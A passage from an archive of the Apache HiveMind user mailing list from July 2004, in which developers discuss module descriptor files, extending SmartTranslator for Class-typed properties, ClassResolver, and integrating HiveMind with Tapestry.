&nbsp;&nbsp;&nbsp; set ( property=3DlockManagerClass value=3D${ojb.lockmanager.class} = )&nbsp;&nbsp;&nbsp; </span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; set ( property=3DlockMapClass&nbsp;&nbsp;&nbsp;&nbsp; = value=3D${ojb.lockmap.class} )</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt; font-family:"Courier New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = }&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = </span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp; }</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = }</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; contribution (configuration-id=3Dhivemind.FactoryDefaults)</span></font><font = size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = {</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp; default (symbol=3Dojb.lockmanager.class&nbsp; value=3Dorg.apache.ojb.odmg.locking.LockManagerDefaultImpl)</span></font>= <font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp; default (symbol=3Dojb.lockmap.class&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; value=3Dorg.apache.ojb.odmg.locking.InMemoryLockMapImpl)</span></font><fo= nt size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = }</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier New"'>-kurt = h<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> </div> </body> </html> ------_=_NextPart_001_01C469BF.ECB0EDCC-- From [email protected] Wed Jul 14 17:12:09 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25626 invoked from network); 14 Jul 2004 17:12:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 14 Jul 2004 17:12:08 -0000 Received: (qmail 9349 invoked by uid 500); 14 Jul 2004 17:12:06 -0000 Delivered-To: [email protected] Received: (qmail 9323 invoked by uid 500); 14 Jul 2004 17:12:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9303 invoked by uid 99); 14 Jul 2004 17:12:05 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_BY_IP,SB_NEW_BULK,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Wed, 14 Jul 2004 10:12:00 -0700 Received: by mproxy.gmail.com with SMTP id x71so2409122cwb for <[email protected]>; Wed, 14 Jul 2004 10:11:59 -0700 (PDT) Received: by 161.129.204.104 with SMTP id v3mr169950cwb; Wed, 14 Jul 2004 10:11:59 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 14 Jul 2004 13:11:59 -0400 From: Howard Lewis Ship <[email protected]> To: [email protected] Subject: Re: hivemodule.xml vs. hivemodule.sdl in HiveMind In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I wonder where the hivemodule.xml would have come from? It was removed ages ago. HiveMind will use either hivemodule.sdl or hivemodule.xml. The extension controls which parser is used. On Wed, 14 Jul 2004 11:47:31 -0400, Hensley, Richard <[email protected]> wrote: > I'm trying to get hivemind running in Eclipse so I can debug it. I have a > question about which hivemodule file to include in the executable target. > > After poking around in the .jar file, I think the correct file is > framework/src/descriptor/META-INF/hivemodule.sdl not > framework/bin/META-INF/hivemodule.xml. > > Is this right? > > I'm using the 1.0-beta-1 download. > > Richard > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 14 17:14:47 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27043 invoked from network); 14 Jul 2004 17:14:47 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 14 Jul 2004 17:14:47 -0000 Received: (qmail 20202 invoked by uid 500); 14 Jul 2004 17:14:47 -0000 Delivered-To: [email protected] Received: (qmail 20128 invoked by uid 500); 14 Jul 2004 17:14:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20115 invoked by uid 99); 14 Jul 2004 17:14:46 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=BLANK_LINES_70_80,RCVD_BY_IP,SB_NEW_BULK,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Wed, 14 Jul 2004 10:14:41 -0700 Received: by mproxy.gmail.com with SMTP id x43so402758cwb for <[email protected]>; Wed, 14 Jul 2004 10:14:40 -0700 (PDT) Received: by 161.129.204.104 with SMTP id u5mr52836cwc; Wed, 14 Jul 2004 10:14:40 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 14 Jul 2004 13:14:40 -0400 From: Howard Lewis Ship <[email protected]> To: [email protected] Subject: Re: Smart Translator - Class type In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I'd rather add startup code to register a proper PropertyEditor with the JavaBeans framework. There's an extension point for this purpose (hivemind.Startup). Once the PropertyEditor is defined, it should "just work". Better a solution for that, than to start introducing special cases into the code. ----- Original Message ----- From: Kurt R. Hoehn <[email protected]> Date: Wed, 14 Jul 2004 12:30:50 -0400 Subject: Smart Translator - Class type To: [email protected] Hello, =20 The interface that I'm implementing has 2 getter methods that return type "Class" and it blows up every time on the getXXXX method calls. So I did some digging around with the Sm= art Translator and there is no editor for type Class which is by design. =20 Is there a reason for the Smart Translator not supporting other java fundamental types (i.e. Class)? =20 =20 I modified the SmartTranslator.java translate method and it seemed to work and it passed all Unit Tests. =20 public Object translate(Module contributingModule, Class propertyType, String inputValue) { =E2=80=A6 =20 if (e =3D=3D null) { if( propertyType.getName().equals("java.lang.Class") ) { ClassResolver resolver =3D contributingModule.getClassResolver(); return resolver.findClass(inputValue); } else { throw new AplicationRuntimeException(RulesMessages.noPropertyEditor(propertyType)= ); } } =20 =E2=80=A6 } =20 My hivemodule.sdl =20 service-point ( id=3DLockingConfiguration=20 =20 interface=3Dorg.apache.ojb.odmg.locking.LockingConfiguration) { invoke-factory( service-id=3Dhivemind.BuilderFactory ) { construct (class=3Dcom.etranscor.hivemind.ojb.configuration.LockingConfigurationImpl) { =20 set ( property=3DlockManagerClass value=3D${ojb.lockmanager.class} ) =20 =20 set ( property=3DlockMapClass value=3D${ojb.lockmap.class} ) } =20 } } =20 contribution (configuration-id=3Dhivemind.FactoryDefaults) { default (symbol=3Dojb.lockmanager.class=20 value=3Dorg.apache.ojb.odmg.locking.LockManagerDefaultImpl) default (symbol=3Dojb.lockmap.class =20 value=3Dorg.apache.ojb.odmg.locking.InMemoryLockMapImpl) } =20 -kurt h =20 --=20 Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 14 17:31:39 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35307 invoked from network); 14 Jul 2004 17:31:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 14 Jul 2004 17:31:39 -0000 Received: (qmail 63441 invoked by uid 500); 14 Jul 2004 17:31:39 -0000 Delivered-To: [email protected] Received: (qmail 63424 invoked by uid 500); 14 Jul 2004 17:31:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63409 invoked by uid 99); 14 Jul 2004 17:31:39 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO ns1.etranscor.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Wed, 14 Jul 2004 10:31:32 -0700 Received: (qmail 8383 invoked from network); 14 Jul 2004 17:31:25 -0000 Received: from unknown (HELO TCISLPTXP01) (161.129.204.104) by ns1.etranscor.com with SMTP; 14 Jul 2004 17:31:25 -0000 From: "Kurt R. Hoehn" <[email protected]> To: <[email protected]> Subject: RE: Smart Translator - Class type Date: Wed, 14 Jul 2004 13:15:18 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Microsoft Office Outlook, Build 11.0.5510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409 Thread-Index: AcRpxhA7S18m8TdrTh6XHBs2/tcRwwAAAB4w In-Reply-To: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Great, thanks for the info. -kurt h -----Original Message----- From: Howard Lewis Ship [mailto:[email protected]] Sent: Wednesday, July 14, 2004 1:15 PM To: [email protected] Subject: Re: Smart Translator - Class type I'd rather add startup code to register a proper PropertyEditor with the JavaBeans framework. There's an extension point for this purpose (hivemind.Startup). Once the PropertyEditor is defined, it should "just work". Better a solution for that, than to start introducing special cases into the code. ----- Original Message ----- From: Kurt R. Hoehn <[email protected]> Date: Wed, 14 Jul 2004 12:30:50 -0400 Subject: Smart Translator - Class type To: [email protected] Hello, The interface that I'm implementing has 2 getter methods that return type "Class" and it blows up every time on the getXXXX method calls. So I did some digging around with the Smart Translator and there is no editor for type Class which is by design. Is there a reason for the Smart Translator not supporting other java fundamental types (i.e. Class)? I modified the SmartTranslator.java translate method and it seemed to work and it passed all Unit Tests. public Object translate(Module contributingModule, Class propertyType, String inputValue) { . if (e == null) { if( propertyType.getName().equals("java.lang.Class") ) { ClassResolver resolver = contributingModule.getClassResolver(); return resolver.findClass(inputValue); } else { throw new AplicationRuntimeException(RulesMessages.noPropertyEditor(propertyType)); } } . } My hivemodule.sdl service-point ( id=LockingConfiguration interface=org.apache.ojb.odmg.locking.LockingConfiguration) { invoke-factory( service-id=hivemind.BuilderFactory ) { construct (class=com.etranscor.hivemind.ojb.configuration.LockingConfigurationImpl) { set ( property=lockManagerClass value=${ojb.lockmanager.class} ) set ( property=lockMapClass value=${ojb.lockmap.class} ) } } } contribution (configuration-id=hivemind.FactoryDefaults) { default (symbol=ojb.lockmanager.class value=org.apache.ojb.odmg.locking.LockManagerDefaultImpl) default (symbol=ojb.lockmap.class value=org.apache.ojb.odmg.locking.InMemoryLockMapImpl) } -kurt h -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 14 18:51:26 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75294 invoked from network); 14 Jul 2004 18:51:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 14 Jul 2004 18:51:26 -0000 Received: (qmail 46781 invoked by uid 500); 14 Jul 2004 18:51:26 -0000 Delivered-To: [email protected] Received: (qmail 46724 invoked by uid 500); 14 Jul 2004 18:51:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46711 invoked by uid 99); 14 Jul 2004 18:51:25 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mail1.mckhboc.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Wed, 14 Jul 2004 11:51:21 -0700 Received: from 161.129.204.104 by mail1.mckhboc.com with ESMTP (Outbound Mail1 SMTP Relay (MMS v5.6.1)); Wed, 14 Jul 2004 11:51:02 -0700 X-Server-Uuid: E618535E-AE39-475D-9091-BC1AF22CB2F2 Received: by smtpout.hboc.com with Internet Mail Service (5.5.2653.19) id <38K3T98G>; Wed, 14 Jul 2004 14:51:14 -0400 Received: from atlexc91nthub.hboc.com (ims2.mckesson.com [161.129.204.104] ) by atlexcsmtpb.hboc.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id 38K3T97Y; Wed, 14 Jul 2004 14:51:03 -0400 Received: by ims2.mckesson.com with Internet Mail Service (5.5.2653.19) id <364CYR5M>; Wed, 14 Jul 2004 14:51:55 -0400 From: "Hensley, Richard" <[email protected]> To: "'[email protected]'" <[email protected]> Message-ID: <[email protected]> Subject: Tapestry Integration Best Practice Advise Date: Wed, 14 Jul 2004 14:50:36 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) X-WSS-ID: 6CEB5F1F1SO621859-01-01 Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I seeking best practice advise for using HiveMind in a Tapestry application. This is my design so far: I'm using the HiveMindFilter to initialize the registry. I overrode createGlobal() in my engine to do the following: protected Object createGlobal(RequestContext arg0) { Global global = (Global) super.createGlobal(arg0); global.setRegistry(HiveMindFilter.getRegistry(arg0.getRequest())); return global; } My global object has getXXX methods for all the services that I might need. They are implemented something like: public Census getCensus() { return (Census) this.registry.getService(Census.class.getName(), Census.class); } And my service definition is: module (id=com.mckesson.lab.services version="1.0.0") { service-point (id=Census interface=com.mckesson.lab.services.Census) } I have an interfaces jar that contains nothing but interface declarations and the HiveMind service point declarations. I have an implementation jar that contains all the implementation classes and the HiveMind service point implementation declarations. I'm fairly new to the use of a IoC container, so I could be all wet in this design. Any comments would be most appreciated. Richard --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 14 20:11:16 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34319 invoked from network); 14 Jul 2004 20:11:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 14 Jul 2004 20:11:16 -0000 Received: (qmail 14249 invoked by uid 500); 14 Jul 2004 20:11:16 -0000 Delivered-To: [email protected] Received: (qmail 14175 invoked by uid 500); 14 Jul 2004 20:11:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 14162 invoked by uid 99); 14 Jul 2004 20:11:16 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_BY_IP,SB_NEW_BULK,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Wed, 14 Jul 2004 13:11:13 -0700 Received: by mproxy.gmail.com with SMTP id x43so406069cwb for <[email protected]>; Wed, 14 Jul 2004 13:11:12 -0700 (PDT) Received: by 161.129.204.104 with SMTP id v38mr173197cwb; Wed, 14 Jul 2004 13:11:12 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 14 Jul 2004 16:11:12 -0400 From: Howard Lewis Ship <[email protected]> To: [email protected] Subject: Re: Tapestry Integration Best Practice Advise In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Obviously, Tapestry 3.1 will have a very well intergrated approach. What I'm doing is to use the HiveMindFilter around my Tapestry application servlet. I use a common base class for all my pages, that defines a registry property. I created an OGNL PropertyAccessor that allows the following syntax: <property-specification name="portalController" type="portal.services.PortalController"> page.registry['portal.PortalController'] </property-specification> In this way, I can access a HiveMind service as a page property. The code for this is just a few lines, but I'll have to check with my client to get the OK to post it publically. On Wed, 14 Jul 2004 14:50:36 -0400, Hensley, Richard <[email protected]> wrote: > I seeking best practice advise for using HiveMind in a Tapestry application. > > This is my design so far: > > I'm using the HiveMindFilter to initialize the registry. > > I overrode createGlobal() in my engine to do the following: > protected Object createGlobal(RequestContext arg0) { > Global global = (Global) super.createGlobal(arg0); > global.setRegistry(HiveMindFilter.getRegistry(arg0.getRequest())); > return global; > } > > My global object has getXXX methods for all the services that I might need. > They are implemented something like: > > public Census getCensus() { > return (Census) this.registry.getService(Census.class.getName(), > Census.class); > } > > And my service definition is: > > module (id=com.mckesson.lab.services version="1.0.0") > { > service-point (id=Census interface=com.mckesson.lab.services.Census) > } > > I have an interfaces jar that contains nothing but interface declarations > and the HiveMind service point declarations. > > I have an implementation jar that contains all the implementation classes > and the HiveMind service point implementation declarations. > > I'm fairly new to the use of a IoC container, so I could be all wet in this > design. > > Any comments would be most appreciated. > > Richard > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jul 16 07:45:12 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77047 invoked from network); 16 Jul 2004 07:45:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 16 Jul 2004 07:45:12 -0000 Received: (qmail 90206 invoked by uid 500); 16 Jul 2004 07:45:11 -0000 Delivered-To: [email protected] Received: (qmail 90169 invoked by uid 500); 16 Jul 2004 07:45:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89843 invoked by uid 99); 16 Jul 2004 07:45:08 -0000 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=NO_REAL_NAME,RCVD_IN_RFC_IPWHOIS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO ns1.post.ch) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Fri, 16 Jul 2004 00:45:03 -0700 Received: from hpie0c.post.ch (hpie0c.post.ch [161.129.204.104]) by ns1.post.ch (8.13.0/8.13.0) with SMTP id i6G7it4B010937 for <[email protected]>; Fri, 16 Jul 2004 09:44:56 +0200 Received: from nodnsquery(161.129.204.104) by hpie0c.post.ch via csmap id 076386c0_d6fc_11d8_8634_00304811b3c7_19750; Fri, 16 Jul 2004 09:44:55 +0200 (CEST) Received: from hmsx09.pnet.ch (hmsx09.pnet.ch [161.129.204.104]) by hcehan.post.ch (8.13.0/8.13.0) with ESMTP id i6G7irkv352787 for <[email protected]>; Fri, 16 Jul 2004 09:44:54 +0200 (CEST) Received: from hmsx01.pnet.ch ([161.129.204.104]) by hmsx09.pnet.ch with Microsoft SMTPSVC(5.0.2195.6713); Fri, 16 Jul 2004 09:44:54 +0200 X-MimeOLE: Produced By Microsoft Exchange V6.0.6556.0 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: Smart Translator - Class type Date: Fri, 16 Jul 2004 09:44:54 +0200 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Smart Translator - Class type Thread-Index: AcRpxhA7S18m8TdrTh6XHBs2/tcRwwAAAB4wAFBxsXA= From: <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 16 Jul 2004 07:44:54.0810 (UTC) FILETIME=[C8ECF7A0:01C46B08] X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Kurt, I read your example on the Wiki on how to extend the SmartTranslator service. Nice work! I just thought maybe you should be using the HiveMind ClassResolver to lookup your classes by name instead. Specifically, the oah.impl.DefaultClassResolver class. It both uses the thread context class loader (provided by the container) and has error handling code builtin. --knut P.S. Ted Neward also wrote a great article about Class.forName() -- http://www.theserverside.com/articles/article.tss?l=3Ddm_classForname > -----Original Message----- > From: Kurt R. Hoehn [mailto:[email protected]]=20 > Sent: Mittwoch, 14. Juli 2004 19:15 > To: [email protected] > Subject: RE: Smart Translator - Class type >=20 >=20 > Great, thanks for the info. >=20 > -kurt h >=20 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jul 16 11:11:06 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75037 invoked from network); 16 Jul 2004 11:11:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 16 Jul 2004 11:11:06 -0000 Received: (qmail 1908 invoked by uid 500); 16 Jul 2004 11:11:05 -0000 Delivered-To: [email protected] Received: (qmail 1894 invoked by uid 500); 16 Jul 2004 11:11:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1881 invoked by uid 99); 16 Jul 2004 11:11:04 -0000 X-ASF-Spam-Status: No, hits=1.8 required=10.0 tests=HTML_40_50,HTML_MESSAGE,HTML_TITLE_EMPTY,SPF_HELO_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO imf18aec.mail.bellsouth.net) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Fri, 16 Jul 2004 04:11:00 -0700 Received: from [161.129.204.104] ([161.129.204.104]) by imf18aec.mail.bellsouth.net (InterMail vM.161.129.204.104 201-253-122-130-108-20031117) with ESMTP id <20040716111053.CPIS1776.imf18aec.mail.bellsouth.net@[161.129.204.104]> for <[email protected]>; Fri, 16 Jul 2004 07:10:53 -0400 Message-ID: <[email protected]> Date: Fri, 16 Jul 2004 07:11:08 -0400 From: "Kurt R. Hoehn" <[email protected]> User-Agent: Mozilla Thunderbird 0.6 (X11/20040502) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: Smart Translator - Class type References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: multipart/alternative; boundary="------------080407080700020001000401" X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N --------------080407080700020001000401 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Thank you for the advice, I will make that correction right now. -kurt h [email protected] wrote: >Kurt, > >I read your example on the Wiki on how to extend the SmartTranslator >service. Nice work! I just thought maybe you should be using the >HiveMind ClassResolver to lookup your classes by name instead. >Specifically, the oah.impl.DefaultClassResolver class. It both uses the >thread context class loader (provided by the container) and has error >handling code builtin. > >--knut > >P.S. Ted Neward also wrote a great article about Class.forName() -- >http://www.theserverside.com/articles/article.tss?l=dm_classForname > > > >>-----Original Message----- >>From: Kurt R. Hoehn [mailto:[email protected]] >>Sent: Mittwoch, 14. Juli 2004 19:15 >>To: [email protected] >>Subject: RE: Smart Translator - Class type >> >> >>Great, thanks for the info. >> >>-kurt h >> >> >> > >--------------------------------------------------------------------- >To unsubscribe, e-mail: [email protected] >For additional commands, e-mail: [email protected] > > > > > --------------080407080700020001000401 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type"> <title></title> </head> <body bgcolor="#ffffff" text="#000000"> Thank you for the advice, I will make that correction right now.<br> <br> -kurt h<br> <br> <a class="moz-txt-link-abbreviated" href="mailto:[email protected]">[email protected]</a> wrote: <blockquote cite="[email protected]" type="cite"> <pre wrap="">Kurt, I read your example on the Wiki on how to extend the SmartTranslator service. Nice work! I just thought maybe you should be using the HiveMind ClassResolver to lookup your classes by name instead. Specifically, the oah.impl.DefaultClassResolver class. It both uses the thread context class loader (provided by the container) and has error handling code builtin. --knut P.S. Ted Neward also wrote a great article about Class.forName() -- <a class="moz-txt-link-freetext" href="http://www.theserverside.com/articles/article.tss?l=dm_classForname">http://www.theserverside.com/articles/article.tss?l=dm_classForname</a> </pre> <blockquote type="cite"> <pre wrap="">-----Original Message----- From: Kurt R. Hoehn [<a class="moz-txt-link-freetext" href="mailto:[email protected]">mailto:[email protected]</a>] Sent: Mittwoch, 14. Juli 2004 19:15 To: <a class="moz-txt-link-abbreviated" href="mailto:[email protected]">[email protected]</a> Subject: RE: Smart Translator - Class type Great, thanks for the info. -kurt h </pre> 